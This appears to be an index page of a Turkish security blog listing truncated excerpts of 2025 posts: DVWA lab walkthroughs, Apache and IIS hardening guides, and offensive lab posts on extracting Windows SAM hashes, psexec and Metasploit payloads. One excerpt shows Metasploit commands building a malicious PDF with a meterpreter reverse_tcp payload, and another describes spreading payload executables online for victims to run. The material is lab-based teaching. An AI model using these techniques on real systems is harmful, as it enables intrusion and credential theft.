|
|
|
|
2025 yılı sonuçları :
|
|
|
|
|
Merhaba, önceki yazımda bahsettiğim dvwa uygulamasında high level güvenlik seviyesini atlatma ve brute force saldırısı yapma yönteminin son sürüm burpsuite yazılımlarında hatalı çalıştığını fark etmem sonucunda modern burpsuite yazılımlarında nasıl aynı işlemin tekrarlanabileceğini göstermek için bu yazıyı kaleme almaktayım. Bu yazıda dvwa web uygulaması high güvenlik seviyesindeyken brute force yaparak nasıl uygulama kullanıcısı parolasının çalınabileceği gösterilecektir.
Konuya giriş ... [Devamı] |
Bu yazı 23.03.2025 tarihinde, saat 03:18:06'de yazılmıştır. |
|
|
|
|
|
Merhaba, bu yazıda dvwa web uygulamasında güvenlik medium seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Cross Site Request Forgery (Low Level)
DVWA Cross Site Request Forgery (Medium Leve... [Devamı] |
Bu yazı 24.03.2025 tarihinde, saat 01:25:30'de yazılmıştır. |
|
|
|
|
|
Merhaba, bu yazıda dvwa web uygulamasında csrf için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Cross Site Request Forgery (Low Level)
DVWA Cross Site Request Forgery (Med... [Devamı] |
Bu yazı 24.03.2025 tarihinde, saat 02:38:17'de yazılmıştır. |
|
|
|
|
|
Merhaba, bu yazıda dvwa web uygulamasında sql injection için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA SQL Injection (Low Level)
DVWA SQL Injection (Low Level) II
DVW... [Devamı] |
Bu yazı 25.03.2025 tarihinde, saat 06:54:23'de yazılmıştır. |
|
|
|
|
|
Merhaba, bu yazıda dvwa web uygulamasında blind sql injection için güvenlik high seviyeye çıkarıldığında ne önlem alındığı ve nasıl bu güvenliğin atlatılabileceği gösterilecektir.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA Blind SQL Injection (Low Level)
DVWA Blind SQL Injection (Me... [Devamı] |
Bu yazı 25.03.2025 tarihinde, saat 08:39:06'de yazılmıştır. |
|
|
|
|
|
Bu yazıda güvenlik düzeyi High seviyesine yükseltilmiş DVWA'da Stored XSS'e karşı ne gibi bir güvenlik önlemi alındığı incelenecektir ve alınan güvenlik önlemine rağmen yine Stored XSS saldırısı düzenlenebilir mi sorusuna yanıt aranacaktır.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
bu yazının ilintili olduğu dvwa eğitim serisindeki diğer makalelere ise şu adreslerden
DVWA St... [Devamı] |
Bu yazı 26.03.2025 tarihinde, saat 04:18:07'de yazılmıştır. |
|
|
|
|
|
Merhaba, bu yazıda dvwa web uygulamasında var olan güvenlik seviyesi takılı kalma problemi için sorunun nasıl çözümlenebileceği açıklanacaktır.
Konuya giriş yapmadan önce bu yazının dahil olduğu dvwa eğitim serisindeki tüm makalelere şu adresten
DVWA Tüm Dersler
erişebilirsiniz.
Problem
DVWA'nın bu eğitim serisinde kullanılan 1.9 sürümünde bazı ders sayfalarında güvenlik seviyesi takılı kalabiliyor. Örneğin güvenlik seviyesini ayarlama sayfasında güvenl... [Devamı] |
Bu yazı 15.04.2025 tarihinde, saat 00:46:58'de yazılmıştır. |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Apache Remote Buffer Overflow and Local Privilege Escalation VM (Ubuntu 20.04 LTS)
// Saldırgan VM
Kioptrix - Level 1
// Hedef VM
Hazırlık
“Apache Mod_SSL Remote Buffer Overflow” zafiyeti
Apache yazılımı ve
Apache’nin mod_ssl modülünde
yer alan güvenlik açıklığı yoluyla apache web sunuculara uzaktan buffer ov... [Devamı] |
Bu yazı 06.05.2025 tarihinde, saat 05:03:45'de yazılmıştır. |
|
|
|
|
|
Burp ile yapılan Brute Force ve Dictionary saldırılarında ekranda akan denemeler sırasında iki metot söz konusudur. Bunlardan birincisi yanlış denemelerde gelen bir cümleyi referans alma, ikincisi ise doğru denemede gelen (gelecek) bir cümleyi referans almadır.
Web uygulama login sayfalarında yanlış hesap bilgisi girildiğinde bir hata / uyarı cümlesi gelir. Doğru hesap bilgisi girildiğinde ise belki bir hoşgeldiniz cümlesi gelir. Dolayısıyla olası hesapları denerken denemelerimiz içeri... [Devamı] |
Bu yazı 06.05.2025 tarihinde, saat 07:43:16'de yazılmıştır. |
|
|
|
|
|
Çoğu web tarayıcı HTML formlarına girilen kullanıcı hesaplarını hatırlatma konusunda bir mekanizmaya sahiptirler. Bu mekanizma enable edildiğinde kullanıcı hesapları kullanıcının makinesine depolanır. Depolanan kullanıcı hesapları bir sonraki ziyarette ise tarayıcı tarafından aynı uygulamaya çekilir.
Kullanıcı makinesinde depolanan otomatik tamamlama verileri kullanıcının makinesine “kullanıcı seviyesinde kod çalıştırma haklarıyla sızarak” ya da “fiziksel anlamda makineye erişerek” eld... [Devamı] |
Bu yazı 06.05.2025 tarihinde, saat 12:32:09'de yazılmıştır. |
|
|
|
|
|
XSS zafiyetleri üçe ayrılırlar. Bunlar Stored Xss, Reflected Xss ve Dom Xss' tirler. Stored Xss girilen input'un filtrelenmeden hedef web uygulamasının veritabanına kaydolduğu ve oradan çekilerek web uygulaması içerisinde kullanıldığı durumda ortaya çıkar. Reflected Xss girilen input'un filtrelenmeden olduğu gibi web uygulamasının bir noktasına yansıtıldığı durumda ortaya çıkar. Dom Xss ise yine girilen input'un filtrelenmeden olduğu gibi web uygulamasının bir noktasına yansıtıldığı durumda orta... [Devamı] |
Bu yazı 07.05.2025 tarihinde, saat 07:22:20'de yazılmıştır. |
|
|
|
|
|
Bir web sunucuda http trace metodu açıldığında http talep ve http yanıtlarının log’lanması işlemi etkinleşir.
(ENG)
Metasploit Tip: Enable HTTP request and response logging with set HttpTrace true
(TUR)
Measploit İpucu: HttpTrace’i true yapma ile http talep ve yanıt log’lama aktifleşir.
Referans: Metasploit Framework msfconsole arayüzünde gelen rastgele ipuçları
Http trace ile bir web sunucuya talep gönderildiğinde gönderilen htt... [Devamı] |
Bu yazı 11.05.2025 tarihinde, saat 23:16:50'de yazılmıştır. |
|
|
|
|
|
Normalde <a> tag'ı target="_blank" ile kullanıldığında bir başka sayfaya sıçrarırız. Fakat target="_blank" ile sıçradığımız sayfalar parent sayfanın window.open nesnesini düzenleyebilme yetkisine sahip olduklarından sıçradığımz sayfa javascript kodlaması ile window.open nesnesini manipule edebilir ve parent sayfayı başka bir sayfaya yönlendirebilir. Böylece kurban parent sayfaya döndüğünde belki de orijinal sayfanın birebir kopyası bir başka sayfayı görüntüleyeceğinden kullanıcı adı, şifre gi... [Devamı] |
Bu yazı 13.05.2025 tarihinde, saat 11:53:00'de yazılmıştır. |
|
|
|
|
|
Referer Header
a. Referer Header Nedir?
Referer başlığı bir http request başlığıdır. Referer header'ı bir web sitesindeki linkten bir başka sayfaya atladığımızda atladığımız sayfaya nereden geldiğimizi gösteren link değerini alır. Böylece web site sahipleri uygulamalarına trafiğin nereden geldiğini gözlemleyebilirler. Bir örnek vermek gerekirse scotthelme.co.uk web sitesi sahibi kendisine gelen trafikten 4000 kullanıcının twitter'dan geldiğini gözlemlemiş. Aşağıda bu site sah... [Devamı] |
Bu yazı 15.05.2025 tarihinde, saat 11:32:28'de yazılmıştır. |
|
|
|
|
|
Second Order Sql Injection kullanıcıdan gelen kötü amaçlı kodun ilk yerleştiği sorguda zafiyet teşkil etmediği ancak daha sonra kullanıldığı sorgularda zafiyet teşkil ettiği durumlara denir. Daha detaylı ifade edecek olursak second order sql injection sql kodlarının sisteme gönderilmesi sonrası ilk sorguyu geçip veritabanına olduğu gibi kaydedilmesi, ardından kaydedilen verinin uygulamaya ait bir başka sayfa tarafından çağırılması sonucu ortaya çıkan zafiyete denir.
Second Order Sql Inj... [Devamı] |
Bu yazı 15.05.2025 tarihinde, saat 17:33:13'de yazılmıştır. |
|
|
|
|
|
İçindekiler
X-Frame-Options Başlığı
a. Frame Nedir?
b. Clickjacking Nedir?
c. Clickjacking Saldırı Türleri
d. X-Frame-Options Nasıl Korur?
e. X-Frame-Options Nasıl Aktif Edilir?
f. Clickjacking Sonuç
g. EK: Missing X-Frame-Options Zafiyeti ve Insecure External Frame Usage Zafiyeti Arasındaki Fark
Uygulama 1 [Clickjacking Uygulaması]
Uygulama 2 [Clickjacking Uygulaması (Facebook Like & Share Butonları)]
Uygulama 3 [X-Frame-Options ile Önlem Uygulamas... [Devamı] |
Bu yazı 15.05.2025 tarihinde, saat 21:47:34'de yazılmıştır. |
|
|
|
|
|
a. X-XSS-Protection Nedir
X-XSS-Protection yanıt başlığı eski web tarayıcılarda XSS saldırılarını önleyen bir http güvenlik başlığıdır. Web tarayıcılarının görüntülediği web uygulamalarda xss payload’u gelirse bu xss payload’unun web tarayıcıda çalışmasını önler ve son kullanıcının güven içinde web uygulamada gezinmesini sağlar. Günümüzde daha kapsamlı olan Content-Security-Policy’ye yerini bırakmıştır. Fakat eski işletim sistemleri kullanan ve dolayısıyla eski web tarayıcılar kullanan ... [Devamı] |
Bu yazı 16.05.2025 tarihinde, saat 03:04:24'de yazılmıştır. |
|
|
|
|
|
Bu zafiyet jQuery kütüphanesinin güncel versiyonunun web uygulamasında kullanılmamasını ifade etmektedir. Bu yazı ise çoğu web geliştiricisinin jQuery kütüphanesinin en güncel versiyonunu kullandığını zannederken aslında nasıl eski versiyonunu kullandığını gösterecektir.
jQuery'nin resmi sitesinin yayınladığı jquery stabil versiyonları şu şekildedir:
jQuery 1.x
jQuery 2.x
jQuery 3.x
Bu kütüphaneler indirilip web uygulamasına eklenebileceği gibi CDN linkleri ile de... [Devamı] |
Bu yazı 16.05.2025 tarihinde, saat 05:21:26'de yazılmıştır. |
|
|
|
|
|
Web tarayıcılar web sunuculardan gelen yanıt paketlerini okurlarken yanıt paketlerindeki Content-Type başlığına bakarlar ve ona göre paket içeriğini okuma / yorumlama ve ekrana sunma uygularlar. Fakat yanıt paketlerinde Content-Type başlığı bozuk değerde olursa veya Content-Type başlığı hiç yer almazsa yanıt paketinin doğru okunabilmesi / yorumlanabilmesi ve ekrana sunulabilmesi amacıyla eski web tarayıcı yazılımları (özellikle Internet Explorer) yanıt paketleri içerisindeki içerik üzerinde Cont... [Devamı] |
Bu yazı 16.05.2025 tarihinde, saat 19:09:33'de yazılmıştır. |
|
|
|
|
|
(+) Bu uygulama birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 18.04 LTS - Nmap SSL-ENUM-CIPHER Script’i
// Host Makine
Kali 2019.3 VM - Apache
// Guest Makine - Örnek Bir// Apache Web Sunucu
a. Apache’de HTTPS Açma
Apache web sunucularda yapılandırmaya giderek ssl/tls özelliği açılabilir. Bu işlemler önce ssl/tls veri iletimi için public ve private anahtar oluşturma, sonra ssl/tls özelliğinin apache konfig... [Devamı] |
Bu yazı 17.05.2025 tarihinde, saat 01:12:50'de yazılmıştır. |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Directory Listing demek hedef web uygulamasını dizin ve hiyerarşileriyle beraber dosyalarını görüntüleme demektir. Bu dizin listeleme işlevi hedef web uygulamasında paylaşılmayan ama sunucuda olan hassas dosyaların görünmesine ve okunmasına olanak sağlar. Dolayısıyla kapatılması önerilmektedir.
Apache sunucularda Directory Listing kapatmanın yolu apache2.conf dosyasını yapılandırmaktan geçer. Öncelikle localhost'um... [Devamı] |
Bu yazı 17.05.2025 tarihinde, saat 05:37:01'de yazılmıştır. |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Belli başlı http güvenlik başlıkları vardır. Bunlar arasında
X-XSS-Protection
// Eski tarayıcılar için XSS
// önleyici header
X-Content-Type-Options
// Sunucudan gelen dosyayı
// belirtilen uzantıyla
// çalıştırma kısıtı
Set-cookie (HttpOnly, Secure, SameSite)
// Ortaya çıkabilecek olası
// zafiyetlere karşı (örn;
// xss'e karşı) çerez güvenliğini
// sağlar ve çerezin üçüncü parti... [Devamı] |
Bu yazı 17.05.2025 tarihinde, saat 21:56:17'de yazılmıştır. |
|
|
|
|
|
Http Options methodu sunucuda izinli http methodları bilgisinin http yanıtlarıyla kullanıcılara gitmesini sağlayan bir http methodudur. Eğer bir sunucuda http options methodu açık olursa web geliştiricisi dalgınlıkla PUT ya da DELETE gibi http methodlarını sunucuda açık bıraktığında saldırganın bundan haberi olacaktır. Saldırgan bu bilgiden yola çıkarak hedef web sunucusuna dosya yükleyebileceğini ya da hedef web sunucusundan dosya silebileceğini anlayacaktır ve saldırısını gerçekleştirecektir.
... [Devamı] |
Bu yazı 17.05.2025 tarihinde, saat 22:47:14'de yazılmıştır. |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Apache'de varsayılan olarak Trace methodu kapalı gelir. Bunu aşağıda görebilmekteyiz:
telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
TRACE / HTTP/1.0
HTTP/1.1 405 Method Not Allowed
Date: Tue, 17 Oct 2017 07:47:31 GMT
Server: Apache/2.4.7 (Ubuntu)
Allow:
Content-Length: 297
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML ... [Devamı] |
Bu yazı 18.05.2025 tarihinde, saat 02:25:04'de yazılmıştır. |
|
|
|
|
|
(+) Denendi ve başarıyla uygulandı.
Apache yazılımı kullanan bir web sitesinin olmayan bir dizinine bağlanmaya çalıştığımızda normal koşullarda 404 Not Found hatası alırız. Ancak bazen bu hatanın yanında bir de web sunucuda çalışan web server yazılımının bilgisini, hatta web sunucuda çalışan işletim sisteminin bilgisini alabiliriz. Veyahut siteye bağlandığımızda karşılığında aldığımız HTTP Response paketinin header'ında da aynı bilgileri alabiliriz. Peki bunları nasıl engelleyebilir... [Devamı] |
Bu yazı 18.05.2025 tarihinde, saat 02:27:00'de yazılmıştır. |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Apache sunucularda SSLv2 ve SSLv3'yi disable edip daha güvenli olan TLS protokolünü enable etmek için
sudo a2enmod ssl // SSL modülü yüklenir.
nano /etc/apache2/apache2.conf
satırları konsola girilir ve aşağıdaki satır apache2.conf dosyasının en altına eklenir.
SSLProtocol -all +TLSv1.2
-all ile tüm şifreleme protokolleri disable olur. + ile de belirtilen şifreleme pr... [Devamı] |
Bu yazı 18.05.2025 tarihinde, saat 05:27:27'de yazılmıştır. |
|
|
|
|
|
(+) Bu uygulama birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 18.04 LTS - Nmap SSL-ENUM-CIPHER Script’i
// Host Makine
Windows Server 2012 R2 VM
// Guest Makine - Örnek// Windows IIS// Sunucu
a. IIS’de HTTPS Açma
Windows Server makinelerde IIS Yöneticisi’nden hizmet olarak sunulan web siteye erişimin https üzerinden olabilmesi özelliği açılabilir. Bu işlemler IIS Yöneticisi’nden uygulanır. Adımlar şu şekildedir... [Devamı] |
Bu yazı 20.05.2025 tarihinde, saat 11:29:25'de yazılmıştır. |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Windows Server 2008 R2 Sanal Makinası
Belli başlı http güvenlik başlıkları vardır. Bunlar arasında
X-XSS-Protection
// Eski tarayıcılar için XSS
// önleyici header
X-Content-Type-Options
// Sunucudan gelen dosyayı
// belirtilen uzantıyla
// çalıştırma kısıtı
Set-cookie (HttpOnly, Secure, SameSite)
// Ortaya çıkabilecek olası
// zafiyetlere karşı (örn... [Devamı] |
Bu yazı 21.05.2025 tarihinde, saat 18:27:24'de yazılmıştır. |
|
|
|
|
|
İçindekiler
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği)
IIS Fingerprinting Engelleme (Windows Server 2012 R2 Örneği)
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği) - Ekstra
IIS Fingerprinting Engelleme (Windows Server 2008 R2 Örneği)
(+) Bu başlık birebir denenmiştir ve başarıyla uygulanmıştır.
IIS çalışan web sunucuları http yanıt paketlerinde bilgi ifşasında bulunabilmekteler. Bu bilgi ifşalarını durdurabilm... [Devamı] |
Bu yazı 22.05.2025 tarihinde, saat 21:53:20'de yazılmıştır. |
|
|
|
|
|
(+) Birebir Windows Server 2008 R2 ve 2012 R2’de denenmiştir ve başarılı olunmuştur.
IIS sunucularda http metotlarını kapamak için IIS Manager arayüzü kullanılabilir. Bu işlem IIS Request Filtering ekranındaki Http Verbs sekmesinde Edit Features ayar penceresinde yer alan AllowUnlistedVerbs tick kutucuğunun tick’li olup olmamasına göre iki farklı şekilde yapılabilir. Şöyle ki:
i) Request Filtering -> Http Verbs sayfasında yer alan Edit Features penceresinde AllowUnlistedVe... [Devamı] |
Bu yazı 23.05.2025 tarihinde, saat 02:24:30'de yazılmıştır. |
|
|
|
|
|
(+) Birebir web.config konfigurasyonları Win Server 2008 R2 ve 2012 R2’de denenmiştir ve başarılı olunmuştur.
IIS sunucularda http metotlarını kapamak için web.config dosyası ve konfigurasyonu kullanılabilir. Bu işlem <RequestFiltering’in alt etiketi <verbs’ün allowUnlisted attribute değeri true veya false olmasına göre iki farklı şekilde yapılabilir. Şöyle ki:
i) RequestFiltering alt etiketi <verbs etiketinin allowUnlisted attriute değeri true iken;
... [Devamı] |
Bu yazı 23.05.2025 tarihinde, saat 02:41:32'de yazılmıştır. |
|
|
|
|
|
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Windows Server 2008 R2 Sanal Makinası
URLRewrite
Bu yazıda IIS sunucularda Server header'ını modifiye etme ve bu yolla saldırganlar için hedef şaşırtmanın nasıl yapılabileceği gösterilecektir. Bu işlem için IIS sunuculara UrlRewrite tool'unun yüklenmesi (URLScan kurulumu için bkz. URLscan ile IIS Fingerprinting Engelleme) ve sistemin restart'lanması gerekmektedir.
Öncelikle hedef IIS s... [Devamı] |
Bu yazı 23.05.2025 tarihinde, saat 08:13:08'de yazılmıştır. |
|
|
|
|
|
Uygulama I
(+) Birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
Ubuntu 14.04 LTS
// Host Makina
kali-linux-1.0.4-amd64.iso
// Kali (Eski) Sanal Makinası
Bu yazıda Ubuntu ana makinasından Kali (Eski) sanal makinasına (web sunucusuna) özel tcp paketleri yollanacaktır ve böylelikle hedef web sunucusunun uptime süresi öğrenilecektir. Ardından Kali (Eski) sanal makinası (web sunucusu) yapılandırılarak uptime bilgi ifşasının ö... [Devamı] |
Bu yazı 23.05.2025 tarihinde, saat 08:26:55'de yazılmıştır. |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve kısmen başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda Windows kurulu makinayı Kali live USB diski ile başlatıp Windows'taki SAM dosyasını çekme anlatılacaktır. T... [Devamı] |
Bu yazı 24.05.2025 tarihinde, saat 04:05:30'de yazılmıştır. |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda hedef sistem bir Virtual box sanal makinası olacaktır. İçinde Windows 7 yüklü olacaktır. Biz bu sanal makinaya K... [Devamı] |
Bu yazı 24.05.2025 tarihinde, saat 04:06:30'de yazılmıştır. |
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Gereksinimler
Windows 7 Home Premium
// Hedef Sistem
Kali Live 2016
// Hedef Sistemi Boot Edecek İşletim Sistemi... [Devamı] |
Bu yazı 24.05.2025 tarihinde, saat 23:02:54'de yazılmıştır. |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve kısmen başarılı olunmuştur.
Bu yazı bir başka yazı ile bağlıdır. Sıralama şu şekildedir:
Kali Linux Live'den Windows SAM Dosyasını Çekme
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2
Kali Linux Live'den Windows SAM Dosyasını Manipule Etme
Ubuntu Linux'dan Windows SAM Dosyasını Çekme
Bu yazıda Windows ve Ubuntu yanyana kuruluyken Ubuntu'dan Windows'taki SAM dosyasını çekme anlatılacaktır. Tüm bu süreç b... [Devamı] |
Bu yazı 25.05.2025 tarihinde, saat 14:53:09'de yazılmıştır. |
|
|
|
|
|
Psexec Nedir?
Psexec hafifsıklet bir telnet yerine geçen araçtır. Psexec uzak sistemde örneğin cmd.exe gibi process'ler çalıştırmaya imkan verir. Fakat psexec sadece komut satırı process'lerini uzak sistemde çalıştırabilir.
Psexec şu sistemlerde çalışır:
Client: Windows Vista ve daha yukarısı
Server: Windows Server 2008 ve daha yukarısı
Psexec Kullanımı
(+) Bu başlık birebir denenmiştir ve başarıyla uygulanmıştır.
Gereksinimler
... [Devamı] |
Bu yazı 26.05.2025 tarihinde, saat 10:03:20'de yazılmıştır. |
|
|
|
|
|
(+) Bu yazı başarıyla tatbik edilmiştir.
Gereksinimler
Kali 1.0.0
Windows XP (Dandik)
İş Akışı
Msfpayload aracı ile Metasploit framework'te yer alan istediğimiz payload'u exe'leştirebiliriz (paketleyebiliriz). Böylelikle bu exe dosyalarını internette boy boy sergileyerek birinin indirmesini ve çift tıklamasını bekleyebiliriz. Fakat böylesi bir senaryoda sızma işlemini gerçekleştirebilmek için saldırgan olarak bizim makinemizin dinleme m... [Devamı] |
Bu yazı 26.05.2025 tarihinde, saat 13:18:06'de yazılmıştır. |
|
|
|
|
|
(+) Bu belgedeki işlemler birebir denenmiştir ve başarılı olunmuştur
Kali Linux Live'den Windows SAM Dosyasını Çekme - 2 belgesinde Windows parolasının hash haliyle nasıl çekilebileceğinden ve bu hash'in nasıl kırılıp şifrenin elde edilebileceğinden bahsedilmişti. Şimdi ise windows parolasının hash halini değil de direk açık halini nasıl elde edebileceğimizden bahsedilecektir.
Öncelikle yapılacak işlemlere değinelim. İlk olarak parolası alınacak hedef sisteme bir exploit ... [Devamı] |
Bu yazı 26.05.2025 tarihinde, saat 18:24:44'de yazılmıştır. |
|
|
|
|
|
Gereksinimler:
Windows XP SP2 (Dandik)
Eski Kali (kali-linux-1.0.4-amd64.iso)
Adobe Reader v8.1.2
Öncelikle zararlı bir pdf oluşturalım.
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME zararliBelge.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 // Kali IP Adresi
msf exploit(adobe_utilprintf) > set LPORT 4455
ms... [Devamı] |
Bu yazı 27.05.2025 tarihinde, saat 23:28:55'de yazılmıştır. |
|
|
|
|
|
(+) Birebir denenmiştir ve başarılı olunmuştur.
Gereksinimler:
Utilman.exe - Windows 10 Home Premium x64 // Kurban Windows Makine
HBCD_PE_x64.iso // Hacking Aracı
Not:
Hiren's BootCD PE iso’su olan HBCD_PE_x64.iso dosyası ~/Downloads/Hiren's BootCD PE.zip dosya yolunda yedeklidir. Ayrıca resmi sitesinden en güncel hali indirilebilir:
https://www.hirensbootcd.org/download/
Senaryo:
Kurban bilgi... [Devamı] |
Bu yazı 28.05.2025 tarihinde, saat 09:38:51'de yazılmıştır. |
|
|